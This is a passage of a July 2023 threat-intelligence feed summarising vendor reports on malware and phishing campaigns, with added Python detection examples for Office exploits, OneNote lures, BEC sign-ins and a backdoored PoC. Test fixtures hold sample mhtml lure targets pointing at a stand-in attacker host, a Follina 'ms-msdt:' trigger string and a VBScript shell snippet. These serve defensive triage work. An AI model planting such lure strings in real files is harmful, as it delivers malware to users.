Rapid7 has discovered a new campaign using the Blackmoon trojan targeting businesses in the USA and Canada. This campaign focuses on implementing evasion and persistence techniques, such as disabling Windows Defender. The trojan uses various persistence techniques, process injection, and exploits for remote services. It disables security tools, hijacks resources, and communicates with a Command and Control server using web protocols. The webpage includes file names, MD5 hashes, email addresses, a reference to a C&C server, and a link to a related article on monitor persistence.
Source: https://www.rapid7.com/blog/post/2023/07/13/old-blackmoon-trojan-new-monetization-approach/
2023-07-18
A_variant_of_a_common_malware_injection
LOW
Intel Source:
Sucuri
Intel Name:
A_variant_of_a_common_malware_injection
Date of Scan:
2023-07-18
Impact:
LOW
Summary:
A recent Sucuri investigation found malware injecting obfuscated JavaScript into legitimate files, redirecting website traffic to a parked domain for ad monetization. The injected script creates an invisible iframe from the parked domain, generating ad revenue and potentially redirecting visitors to questionable sites.
Source: https://blog.sucuri.net/2023/07/malicious-injection-redirects-traffic-to-parked-domain.html
2023-07-18
RedCurl_Hackers_Return_to_Spy_on_Major_Russian_Banks
MEDIUM
Intel Source:
FACCT
Intel Name:
RedCurl_Hackers_Return_to_Spy_on_Major_Russian_Banks
Date of Scan:
2023-07-18
Impact:
MEDIUM
Summary:
According to FACCT, the Russian-speaking Red Curl organization has attacked businesses in the UK, Germany, Canada, Norway, Ukraine, and Australia at least 34 times. Twenty of the attacks—more than half—took place in Russia. Construction, financial, consultancy, retail, banking, insurance, and legal enterprises were among the victims of cyber espionage.
Source: https://www.facct.ru/blog/redcurl-2023/?utm_source=twitter&utm_campaign=redcurl-23&utm_medium=social
2023-07-18
Massive_Targeted_Exploit_Campaign_Against_WooCommerce_Payments
LOW
Intel Source:
Wordfence
Intel Name:
Massive_Targeted_Exploit_Campaign_Against_WooCommerce_Payments
Date of Scan:
2023-07-18
Impact:
LOW
Summary:
Wordfence researchers have identified an ongoing exploit campaign targeting a vulnerability in the WooCommerce Payments plugin. Attackers can gain administrative privileges on vulnerable websites. Wordfence provides protection against this vulnerability.
Source: https://www.wordfence.com/blog/2023/07/massive-targeted-exploit-campaign-against-woocommerce-payments-underway/?utm_medium=email&_hsmi=266639985&_hsenc=p2ANqtz-8AxrS0jQ-RkxVtD0SfniOq77V_8TP6U08rEjcEDj_b8n3bXW3pcEeNGxsBvY58nI-AEfYwqBRm9q3Xeub5y8sJZSw9rzqT5rAlvdnt2riEjE_XnEc&utm_content=266639985&utm_source=hs_email
2023-07-18
Microsoft_ZeroDay_Vulnerability_Exploited_by_Attackers
HIGH
Intel Source:
Symantec, Cyble
Intel Name:
Microsoft_ZeroDay_Vulnerability_Exploited_by_Attackers
Date of Scan:
2023-07-18
Impact:
HIGH
Summary:
Attackers are making use of a zero-day vulnerability (CVE-2023-36884) that affects Microsoft Windows and Office products. The exploit has so far been applied in extremely targeted attacks against businesses in the European and North American government and defense industries. Link: https://blog.cyble.com/2023/07/12/microsoft-zero-day-vulnerability-cve-2023-36884-being-actively-exploited/
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-zeroday-exploit
2023-07-18
SCARLETEEL_2
LOW
Intel Source:
Sysdig
Intel Name:
SCARLETEEL_2
Date of Scan:
2023-07-18
Impact:
LOW
Summary:
Sysdig observed the most recent activities of SCARLETEEL 2.0, a new version of the SCARLETEEL operation. The analysts saw a strategy similar to the one previously reported: compromising AWS accounts by exploiting vulnerable compute services, gaining persistence, and attempting to make money using cryptominers. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped. From the previously known details of SCARLETEEL, it was discovered that they are not only after cryptomining, but are stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to do with it what they wanted. We also watched them target Kubernetes in order to significantly scale their attack.
Source: https://sysdig.com/blog/scarleteel-2-0/
2023-07-17
Credential_Stealer_Expands_to_Azure_GCP_from_AWS
LOW
Intel Source:
Sentinelone
Intel Name:
Credential_Stealer_Expands_to_Azure_GCP_from_AWS
Date of Scan:
2023-07-17
Impact:
LOW
Summary:
This campaign shows the development of an experienced cloud actor who is knowledgeable about a variety of technologies. The actor apparently underwent a great deal of trial and error, as evidenced by decisions like delivering the curl binary to systems that do not already have it. Additionally, the actor has enhanced the tool's data layout to allow more autonomous operation, displaying a certain amount of maturity and proficiency.
Source: https://www.sentinelone.com/labs/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/
2023-07-17
Beware_of_Cloaked_Ursa_Phishing_Scam
LOW
Intel Source:
PaloAlto
Intel Name:
Beware_of_Cloaked_Ursa_Phishing_Scam
Date of Scan:
2023-07-17
Impact:
LOW
Summary:
Unit 42 researchers have observed instances of Cloaked Ursa using lures focused on the diplomats themselves rather than the countries they represent. They also identified Cloaked Ursa targeting diplomatic missions within Ukraine by leveraging something that all recently posted diplomats need: a vehicle.
Source: https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/
2023-07-17
Microsoft_Office_Vulnerabilities_and_Macros_Used_by_LokiBot_Campaign
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Microsoft_Office_Vulnerabilities_and_Macros_Used_by_LokiBot_Campaign
Date of Scan:
2023-07-17
Impact:
MEDIUM
Summary:
Fortinet researchers have found several malicious Microsoft Office documents crafted to take advantage of known vulnerabilities, specifically the remote code execution flaws CVE-2021-40444 and CVE-2022-30190. Other documents in the campaign rely on malicious VBA macros instead. In either case, opening the document leads to the LokiBot malware being installed on the victim's computer.
Source: https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros
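Both vectors above leave footprints in the document package itself. The following Python triage check is an added example, not Fortinet's code: it opens an Office Open XML file, flags an embedded VBA project, and flags external `oleObject` relationships, in particular ones using the `mhtml:` scheme, which is how both the CVE-2021-40444 (MSHTML, with its `!x-usc:` redirect) and CVE-2022-30190 (Follina) lures pull in their second stage; a second function flags the `ms-msdt:` handler in a fetched HTML page. The documents and the HTML are constructed in memory and the hostnames are placeholders.

```python
"""Triage Office Open XML documents for the two vectors named above.

Added example, not Fortinet's code. The sample documents are constructed in
memory; hostnames are placeholders, not real campaign indicators.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"

MHTML_RE = re.compile(r"^\s*mhtml:", re.IGNORECASE)   # MSHTML loader trick (both CVEs)
XUSC_RE = re.compile(r"!x-usc:", re.IGNORECASE)       # redirect used in CVE-2021-40444 lures
MSDT_RE = re.compile(r"ms-msdt:", re.IGNORECASE)      # Follina handler in the fetched HTML


def scan_document(data: bytes):
    """Return (kind, detail) findings for one .docx/.xlsx/.pptx byte string."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            findings.append(("vba_macro", "vbaProject.bin present"))
        for name in (n for n in names if n.endswith(".rels")):
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                findings.append(("malformed_rels", name))
                continue
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                if rel.get("Type") == OLE_TYPE:
                    # Benign documents almost never link an OLE object externally.
                    findings.append(("external_oleobject", f"{name}: {target}"))
                if MHTML_RE.match(target) or XUSC_RE.search(target):
                    findings.append(("mhtml_target", f"{name}: {target}"))
    return findings


def scan_html(text: str):
    """Second stage: flag fetched HTML that invokes the ms-msdt: protocol handler."""
    return [("msdt_handler", m.group(0)) for m in MSDT_RE.finditer(text)]


def build_docx(rel_type: str, target: str, mode: str = "External", with_macro: bool = False) -> bytes:
    """Construct a minimal .docx with one relationship (test fixture, not a real file)."""
    rels = (f'<Relationships xmlns="{RELS_NS}">'
            f'<Relationship Id="rId1" Type="{rel_type}" Target="{target}" TargetMode="{mode}"/>'
            f'</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0")  # OLE magic only
    return buf.getvalue()


# Constructed samples (placeholder hostnames).
CLEAN_DOC = build_docx(HYPERLINK_TYPE, "https://example.com/policy.pdf")
MSHTML_DOC = build_docx(OLE_TYPE, "mhtml:http://attacker.example/word.html!x-usc:http://attacker.example/word.html")
FOLLINA_DOC = build_docx(OLE_TYPE, "mhtml:http://attacker.example/stage.html!")
MACRO_DOC = build_docx(HYPERLINK_TYPE, "/word/media/image1.png", mode="Internal", with_macro=True)
# Constructed second-stage page of the kind the Follina relationship fetches.
FETCHED_HTML = '<script>window.location.href = "ms-msdt:/id PCWDiagnostic";</script>'

if __name__ == "__main__":
    for label, doc in [("clean", CLEAN_DOC), ("mshtml", MSHTML_DOC),
                       ("follina", FOLLINA_DOC), ("macro", MACRO_DOC)]:
        print(label, scan_document(doc))
    print("html", scan_html(FETCHED_HTML))
```

An external `oleObject` relationship is a strong signal on its own; the `mhtml:` scheme on top of it is close to conclusive. Quarantine such attachments before the mail reaches a user, and keep the VBA finding as a lower-severity signal since macros still have legitimate uses.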
2023-07-17
Malicious_Campaigns_Targeting_Civilian_Military_and_Governmental_Organisations
MEDIUM
+
Intel Source:
Talos
Intel Name:
Malicious_Campaigns_Targeting_Civilian_Military_and_Governmental_Organisations
Date of Scan:
2023-07-17
Impact:
MEDIUM
Summary:
Researchers from Talos have identified a threat actor who has been running various campaigns in Poland and Ukraine against civilian users, military groups, and governmental institutions. They determined that these actions are most likely carried out with the intent to steal data and gain ongoing remote access.
Source: https://blog.talosintelligence.com/malicious-campaigns-target-entities-in-ukraine-poland/
2023-07-16
Introducing_TeamTNT_New_Cloud_Campaign
LOW
+
Intel Source:
Aquasec
Intel Name:
Introducing_TeamTNT_New_Cloud_Campaign
Date of Scan:
2023-07-16
Impact:
LOW
Summary:
AquaSec researchers have uncovered an emerging campaign targeting exposed Docker APIs and JupyterLab instances. Upon further investigation of the infrastructure, they found evidence of a broader campaign orchestrated by TeamTNT.
Source: https://blog.aquasec.com/teamtnt-reemerged-with-new-aggressive-cloud-campaign
2023-07-16
Attackers_Leveraging_OneNote_to_Deliver_Malware
LOW
+
Intel Source:
AT&T
Intel Name:
Attackers_Leveraging_OneNote_to_Deliver_Malware
Date of Scan:
2023-07-16
Impact:
LOW
Summary:
Malware distributed via phishing emails with a OneNote attachment has increased since December 22, 2022. The end user opens the OneNote attachment, as with most phishing lures, but OneNote does not support macros the way Microsoft Word or Excel do; instead, the attackers embed files in the notebook that, when the user clicks them, launch the programs that install the malware.
Source: https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-onenote-malspam-detection-response
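Because the payload in these lures is an embedded file rather than a macro, triage means carving the attachments out of the notebook. The following Python example is added here and is not AT&T's code: OneNote stores each attachment as a FileDataStoreObject whose header and footer begin with fixed GUIDs, so the carver locates the header GUID, reads the 8-byte length that follows, extracts the payload and classifies it by magic bytes. The `.one` byte stream is constructed for the example, and the list of risky file signatures is a deliberately small illustrative set.

```python
"""Carve embedded files out of a OneNote (.one) section file.

Added example, not AT&T's code. OneNote stores attachments as FileDataStoreObject
structures bracketed by fixed GUIDs; the .one sample here is a constructed byte
string, not a real notebook.
"""
import struct

# FileDataStoreObject header {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} and footer
# {71FBA722-0F79-4A0B-BB13-899256426B24}, in their on-disk (mixed-endian) byte order.
FDSO_HEADER = bytes.fromhex("E716E3BD65261145A4C48D4D0B7A9EAC")
FDSO_FOOTER = bytes.fromhex("22A7FB71790F0B4ABB13899256426B24")
# After the header GUID: cbLength (8 bytes LE), unused (4), reserved (8), then FileData.
FDSO_FIXED = struct.Struct("<Q4s8s")

# Magic bytes of file types that have no business inside an e-mailed notebook.
# Illustrative set for the example; extend for real triage.
RISKY_MAGIC = {
    b"MZ": "pe_executable",
    b"\x4c\x00\x00\x00": "lnk_shortcut",
    b"<script": "script_html",
    b"#!": "shebang_script",
}


def classify(payload: bytes) -> str:
    head = payload[:16].lower()
    for magic, label in RISKY_MAGIC.items():
        if payload.startswith(magic) or head.startswith(magic.lower()):
            return label
    return "other"


def carve_embedded_files(data: bytes):
    """Return one dict per FileDataStoreObject found in `data`."""
    out = []
    pos = data.find(FDSO_HEADER)
    while pos != -1:
        body = pos + len(FDSO_HEADER)
        if body + FDSO_FIXED.size > len(data):
            break
        cb_length, _unused, _reserved = FDSO_FIXED.unpack_from(data, body)
        start = body + FDSO_FIXED.size
        end = start + cb_length
        payload = data[start:end]
        # FileData is padded to 8 bytes before the footer GUID, so look in a short window.
        footer_ok = data.find(FDSO_FOOTER, end, end + 8 + len(FDSO_FOOTER)) != -1
        out.append({
            "offset": pos,
            "length": cb_length,
            "truncated": len(payload) < cb_length,
            "footer_ok": footer_ok,
            "type": classify(payload),
            "data": payload,
        })
        pos = data.find(FDSO_HEADER, end)
    return out


def build_sample_one(*files: bytes) -> bytes:
    """Construct a fake .one byte stream containing the given attachments."""
    blob = b"\x00" * 64  # stand-in for the real OneNote file header
    for f in files:
        blob += FDSO_HEADER + FDSO_FIXED.pack(len(f), b"\x00" * 4, b"\x00" * 8) + f
        blob += b"\x00" * ((-len(f)) % 8) + FDSO_FOOTER
    return blob


# Constructed notebook: one harmless PNG-like attachment and one dropper script.
SAMPLE_ONE = build_sample_one(
    b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    b'<script language="vbscript">CreateObject("WScript.Shell")</script>',
)

if __name__ == "__main__":
    for f in carve_embedded_files(SAMPLE_ONE):
        print(f"offset={f['offset']} len={f['length']} type={f['type']} footer_ok={f['footer_ok']}")
```

For a real sample, read the `.one` file as bytes and pass it to `carve_embedded_files`; anything classified as an executable, shortcut or script in an attachment that arrived by e-mail is worth detonating in a sandbox rather than opening.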
2023-07-16
Exploring_AVrecon_Underground_Routers
LOW
+
Intel Source:
Lumen
Intel Name:
Exploring_AVrecon_Underground_Routers
Date of Scan:
2023-07-16
Impact:
LOW
Summary:
Lumen Black Lotus Labs has discovered another multi-year campaign involving infected routers around the world. Small-office/home-office (SOHO) routers are infected as part of a sophisticated operation that uses a Linux-based Remote Access Trojan (RAT) known as "AVrecon."
Source: https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/
2023-07-15
A_New_Sophisticated_Toolkit_For_Vishing_Called_Letscall
LOW
+
Intel Source:
ThreatFabric
Intel Name:
A_New_Sophisticated_Toolkit_For_Vishing_Called_Letscall
Date of Scan:
2023-07-15
Impact:
LOW
Summary:
Researchers from ThreatFabric have identified a new sophisticated vishing toolset called Letscall, which currently targets individuals in South Korea.
Source: https://www.threatfabric.com/blogs/letscall-new-sophisticated-vishing-toolset
2023-07-15
Hackers_Modify_TeamViewer_Installer_to_Deliver_njRAT
LOW
+
Intel Source:
Cyble
Intel Name:
Hackers_Modify_TeamViewer_Installer_to_Deliver_njRAT
Date of Scan:
2023-07-15
Impact:
LOW
Summary:
Researchers from Cyble have discovered a noteworthy case of a trojanized TeamViewer installer used to deliver njRAT. TeamViewer is a popular application that enables remote control, desktop sharing, online meetings, file transfers, and collaboration across numerous devices.
Source: https://blog.cyble.com/2023/07/13/trojanized-application-preying-on-teamviewer-users/
2023-07-14
Malicious_Extension
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Malicious_Extension
Date of Scan:
2023-07-14
Impact:
LOW
Summary:
Malwarebytes researchers analyzed a campaign targeting businesses with a malicious browser extension posing as a tool for Meta's Ads Manager. The lure is delivered as a password-protected RAR archive (password 888 or 999) containing an MSI installer, which was analyzed in the report. The criminals accidentally leaked the accounts they had stolen.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/07/criminals-target-businesses-with-malicious-extension-for-metas-ads-manager-and-accidentally-leak-stolen-accounts
2023-07-14
Stealing_Secrets_With_Infected_USB_Drives
LOW
+
Intel Source:
Mandiant
Intel Name:
Stealing_Secrets_With_Infected_USB_Drives
Date of Scan:
2023-07-14
Impact:
LOW
Summary:
Mandiant researchers have observed a threefold increase in the number of attacks using infected USB drives to steal secrets. The campaigns are named 'Sogu', attributed to the Chinese espionage group TEMP.HEX, and 'Snowydrive', attributed to UNC4698, which targets oil and gas firms in Asia.
Source: https://www.mandiant.com/resources/blog/infected-usb-steal-secrets
2023-07-14
Kimsuky_Threat_Group_Using_Chrome_Remote_Desktop
LOW
+
Intel Source:
ASEC
Intel Name:
Kimsuky_Threat_Group_Using_Chrome_Remote_Desktop
Date of Scan:
2023-07-14
Impact:
LOW
Summary:
ASEC researchers have observed the use of Chrome Remote Desktop by the North Korea-backed Kimsuky threat group in its attacks. The group uses its own AppleSeed malware as well as other remote control tools such as Meterpreter and VNC to gain control over infected systems. Kimsuky mainly distributes malware through spear-phishing emails carrying HWP, MS Office or CHM files, and also uses an infostealer to gather sensitive information.
Source: https://asec.ahnlab.com/en/55145/
2023-07-14
BPFDoor_Backdoor_Variants_Abusing_BPF_Filters
LOW
+
Intel Source:
TrendMicro
Intel Name:
BPFDoor_Backdoor_Variants_Abusing_BPF_Filters
Date of Scan:
2023-07-14
Impact:
LOW
Summary:
BPFDoor has become more difficult to detect through its improved use of Berkeley Packet Filter (BPF), a technology that lets a program attach a network filter to an open socket. The threat actors behind BPFDoor use it to bypass firewall inbound-traffic rules and similar network protections on Linux and Solaris operating systems.
Source: https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html
2023-07-14
SmokeLoader_Distribution_via_Email
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
SmokeLoader_Distribution_via_Email
Date of Scan:
2023-07-14
Impact:
MEDIUM
Summary:
CERT-UA researchers have identified a mass mailing of emails with the subject "Invoice" and an attachment "Act_Zvirky_ta_rah.fakt_vid_12_07_2023.zip" containing the VBS file "invoice_from_12_07_2023_to_payment .vbs"; opening it downloads and launches the SmokeLoader malware.
Source: https://cert.gov.ua/article/5158006
2023-07-13
RedDriver_targets_Chinese_speakers_and_internet_cafes
LOW
+
Intel Source:
Talos
Intel Name:
RedDriver_targets_Chinese_speakers_and_internet_cafes
Date of Scan:
2023-07-13
Impact:
LOW
Summary:
Talos researchers describe a previously undocumented browser hijacker called RedDriver, which targets Chinese speakers and internet cafes and uses the Windows Filtering Platform to intercept browser traffic. It bypasses driver signature enforcement policies and relies on stolen certificates. Its authors are skilled in driver development and have deep knowledge of the Windows operating system. The report also lists domains associated with RedDriver.
Source: https://blog.talosintelligence.com/undocumented-reddriver/
2023-07-13
Business_Email_Compromise_hunting_details
LOW
+
Intel Source:
Huntress
Intel Name:
Business_Email_Compromise_hunting_details
Date of Scan:
2023-07-13
Impact:
LOW
Summary:
Huntress discusses threat hunting for business email compromise (BEC) using user agents in Microsoft 365 logs. The author shares their approach and examples of suspicious user agents, and emphasizes the importance of baselining user behaviour, detection technology, and prevention measures such as multi-factor authentication.
Source: https://www.huntress.com/blog/threat-hunting-for-business-email-compromise-through-user-agents
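The hunting approach above comes down to knowing which user agents each account normally signs in with and reacting when a new one appears. The following Python example is added here and is not Huntress's code: it builds a per-account user-agent baseline from sign-in events, flags post-baseline logins with an unseen user agent, and raises the score when the agent looks like a scripted client or when a mailbox-rule change follows the login within a short window. The events are constructed in the shape of Microsoft 365 Unified Audit Log records (fictional accounts and IPs), and the list of suspicious user-agent markers is a hypothetical starting point.

```python
"""Hunt for BEC-style sign-ins by baselining user agents per account.

Added example, not Huntress's code. The events below are constructed, modelled
on Microsoft 365 Unified Audit Log UserLoggedIn / Exchange admin records;
accounts and IPs are fictional.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: ordinary activity for two users, then a scripted-client
# sign-in followed minutes later by an inbox rule, a classic BEC sequence.
EVENTS = [
    {"t": "2023-07-10T08:01:00", "user": "alice@corp.example", "op": "UserLoggedIn",
     "ip": "203.0.113.10", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/114.0"},
    {"t": "2023-07-10T09:15:00", "user": "alice@corp.example", "op": "UserLoggedIn",
     "ip": "203.0.113.10", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/114.0"},
    {"t": "2023-07-11T08:03:00", "user": "alice@corp.example", "op": "UserLoggedIn",
     "ip": "203.0.113.10", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/114.0"},
    {"t": "2023-07-12T02:44:00", "user": "alice@corp.example", "op": "UserLoggedIn",
     "ip": "198.51.100.77", "ua": "python-requests/2.31.0"},
    {"t": "2023-07-12T02:46:00", "user": "alice@corp.example", "op": "New-InboxRule",
     "ip": "198.51.100.77", "ua": "python-requests/2.31.0"},
    {"t": "2023-07-12T08:00:00", "user": "bob@corp.example", "op": "UserLoggedIn",
     "ip": "203.0.113.22", "ua": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) Safari/605.1.15"},
]

# Hypothetical markers of clients that are rarely legitimate for an interactive
# mailbox user: scripted HTTP libraries and the legacy-auth client string.
SUSPICIOUS_UA_MARKERS = ("python-requests", "curl/", "okhttp", "Go-http-client", "BAV2ROPC")
# Operations an attacker typically performs right after taking over a mailbox.
FOLLOW_ON_OPS = {"New-InboxRule", "Set-InboxRule", "Add-MailboxPermission", "Set-Mailbox"}


def build_baseline(events, before):
    """Map user -> set of user agents seen in logins strictly before `before`."""
    seen = defaultdict(set)
    for e in events:
        if e["op"] == "UserLoggedIn" and datetime.fromisoformat(e["t"]) < before:
            seen[e["user"]].add(e["ua"])
    return seen


def hunt(events, baseline_until, window=timedelta(hours=1)):
    """Flag post-baseline logins whose user agent the account has never used."""
    baseline = build_baseline(events, baseline_until)
    findings = []
    for i, e in enumerate(events):
        if e["op"] != "UserLoggedIn" or datetime.fromisoformat(e["t"]) < baseline_until:
            continue
        if e["user"] not in baseline:
            continue  # no history to compare against; review such accounts separately
        if e["ua"] in baseline[e["user"]]:
            continue
        score, reasons = 1, ["new user agent for account"]
        if any(m.lower() in e["ua"].lower() for m in SUSPICIOUS_UA_MARKERS):
            score += 2
            reasons.append("scripted client user agent")
        t0 = datetime.fromisoformat(e["t"])
        for f in events[i + 1:]:
            if (f["user"] == e["user"] and f["op"] in FOLLOW_ON_OPS
                    and datetime.fromisoformat(f["t"]) - t0 <= window):
                score += 3
                reasons.append(f"{f['op']} within {window} of login")
                break
        findings.append({"user": e["user"], "time": e["t"], "ip": e["ip"],
                         "ua": e["ua"], "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(EVENTS, baseline_until=datetime(2023, 7, 12)):
        print(f"{f['time']} {f['user']} score={f['score']} {f['ua']} :: {'; '.join(f['reasons'])}")
```

In practice the baseline window should span several weeks of `Search-UnifiedAuditLog` output so that a user's occasional second browser does not fire; accounts with no history at all (new hires, first sign-in) are skipped here on purpose and belong in a separate onboarding review.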
2023-07-13
The_cloud_workloads_targeted_by_Python_based_fileless_malware
LOW
+
Intel Source:
Wiz
Intel Name:
The_cloud_workloads_targeted_by_Python_based_fileless_malware
Date of Scan:
2023-07-13
Impact:
LOW
Summary:
Wiz researchers describe PyLoose, a Python-based fileless malware that targets cloud workloads. The report covers the attack flow, including initial access, the drop of the Python script, fileless execution, and in-memory execution of XMRig. It notes the attacker's Monero wallet address and provides the files and hash values associated with the PyLoose loader.
Source: https://www.wiz.io/blog/pyloose-first-python-based-fileless-attack-on-cloud-workloads
2023-07-12
StormP_0978_phishing_campaign_uncovered_by_Microsoft
LOW
+
Intel Source:
Microsoft
Intel Name:
StormP_0978_phishing_campaign_uncovered_by_Microsoft
Date of Scan:
2023-07-12
Impact:
LOW
Summary:
Microsoft has identified Storm-0978 targeting defense and government entities in Europe and North America. Exploiting CVE-2023-36884, the group runs phishing campaigns and distributes the RomCom backdoor. Storm-0978 conducts both opportunistic ransomware and espionage-related operations.
Source: https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/
2023-07-12
The_suspicion_of_targeting_Ukraine_s_NATO_Membership_Talks_by_RomCom_Threat_Actor
MEDIUM
+
Intel Source:
Blackberry
Intel Name:
The_suspicion_of_targeting_Ukraine_s_NATO_Membership_Talks_by_RomCom_Threat_Actor
Date of Scan:
2023-07-12
Impact:
MEDIUM
Summary:
At the beginning of this month, BlackBerry Threat Research found two malicious documents sent from an IP address in Hungary: one used as bait against an organization supporting Ukraine abroad, and one targeting guests of the upcoming NATO Summit. BlackBerry's analysis concludes that the threat actor known as RomCom is behind this operation. Based on its internal network data analysis and the full set of cyber tools collected, BlackBerry believes the actor ran its first drills for this campaign on June 22, a few days before the command-and-control (C2) infrastructure mentioned in the report was registered and went live.
Source: https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
2023-07-12
Deceptive_PoC_poses_hidden_backdoor
LOW
+
Intel Source:
Uptycs
Intel Name:
Deceptive_PoC_poses_hidden_backdoor
Date of Scan:
2023-07-12
Impact:
LOW
Summary:
Uptycs researchers discovered a backdoor disguised as an innocuous proof-of-concept (PoC) learning tool that targets Linux systems. Remediation: remove unauthorized SSH keys, delete the kworker file, remove the kworker path from the .bashrc file, and check for /tmp/.iCE-unix.pid. Exercise caution when testing PoCs and run them only in isolated environments.
Source: https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
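The remediation steps above translate directly into a host check. The following Python example is added here and is not Uptycs's code: it compares `~/.ssh/authorized_keys` against an operator-maintained allow-list of known key blobs, looks for any `kworker` reference in `~/.bashrc` (real kworker threads are kernel-only and never belong in a shell rc file), and tests for the `/tmp/.iCE-unix.pid` marker. The file contents and key blobs in the sample are constructed, and the allow-list is a hypothetical set you would populate from your own key inventory.

```python
"""Check a Linux account for the persistence artefacts described above.

Added example, not Uptycs's code. AUTH_KEYS, BASHRC and KNOWN are constructed
inputs; the key blobs are placeholders, not real keys.
"""
import os

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def check_authorized_keys(content: str, known_keys: set) -> list:
    """Return authorized_keys lines whose key blob is not in `known_keys`."""
    unknown = []
    for line in content.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # Options such as from="..." or command="..." may precede the key type.
        idx = next((i for i, f in enumerate(fields) if f.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(fields):
            unknown.append(line)  # unparsable entry: treat as suspicious
            continue
        if fields[idx + 1] not in known_keys:
            unknown.append(line)
    return unknown


def check_bashrc(content: str) -> list:
    """Return .bashrc lines referencing a 'kworker' path (the backdoor's launcher name)."""
    return [l for l in content.splitlines() if "kworker" in l]


def assess(authorized_keys: str, bashrc: str, known_keys: set, pid_marker_exists: bool) -> dict:
    """Combine the three indicator checks into one verdict."""
    findings = {
        "unknown_ssh_keys": check_authorized_keys(authorized_keys, known_keys),
        "bashrc_kworker_lines": check_bashrc(bashrc),
        "ice_unix_pid_present": pid_marker_exists,
    }
    findings["compromised"] = bool(findings["unknown_ssh_keys"]
                                  or findings["bashrc_kworker_lines"]
                                  or pid_marker_exists)
    return findings


def assess_live_host(home: str = os.path.expanduser("~"), known_keys=frozenset()) -> dict:
    """Run the same checks read-only against a real home directory."""
    def read(path):
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                return fh.read()
        except OSError:
            return ""
    return assess(read(os.path.join(home, ".ssh", "authorized_keys")),
                  read(os.path.join(home, ".bashrc")),
                  set(known_keys),
                  os.path.exists("/tmp/.iCE-unix.pid"))


# Constructed inputs. The key blobs are placeholders, not real keys.
KNOWN = {"AAAAC3NzaC1lZDI1NTE5AAAAIKnownOperatorKey0000000000000000000000"}
AUTH_KEYS = """# operator key
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownOperatorKey0000000000000000000000 ops@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCinjectedByPoC0000000000000000000 root@kali
"""
BASHRC = """# ~/.bashrc
export PATH=$HOME/.local/bin:$PATH
$HOME/.local/kworker &
"""

if __name__ == "__main__":
    print(assess(AUTH_KEYS, BASHRC, KNOWN, pid_marker_exists=True))
```

`assess_live_host` is the piece to run on a box that executed an untrusted PoC; feed it the set of key blobs from your SSH key inventory so that a new entry stands out even when its comment looks plausible.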
2023-07-11
Analysis_of_New_MultiStage_Attack_Targeting_LATAM_Region
LOW
+
Intel Source:
Zscaler
Intel Name:
Analysis_of_New_MultiStage_Attack_Targeting_LATAM_Region
Date of Scan:
2023-07-11
Impact:
LOW
Summary:
Zscaler researchers have uncovered a new targeted attack campaign striking businesses in the Latin American (LATAM) region. The campaign employs the Toitoin trojan, which follows a multi-stage infection chain using specially crafted modules at each stage.
Source: https://www.zscaler.com/blogs/security-research/toitoin-trojan-analyzing-new-multi-stage-attack-targeting-latam-region
2023-07-11
Rekoobe_Backdoor_targeting_Linux_systems_in_Korea
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Rekoobe_Backdoor_targeting_Linux_systems_in_Korea
Date of Scan:
2023-07-11
Impact:
MEDIUM
Summary:
AhnLab Security Emergency Response Center (ASEC) has been receiving reports of the Rekoobe malware from tenants in Korea for several years and shares a brief analysis. The Rekoobe variants are categorized, with a summary of those used to target Korean companies.
Source: https://asec.ahnlab.com/en/55229/
2023-07-11
Rootkit_acts_as_a_universal_loader
LOW
+
Intel Source:
TrendMicro
Intel Name:
Rootkit_acts_as_a_universal_loader
Date of Scan:
2023-07-11
Impact:
LOW
Summary:
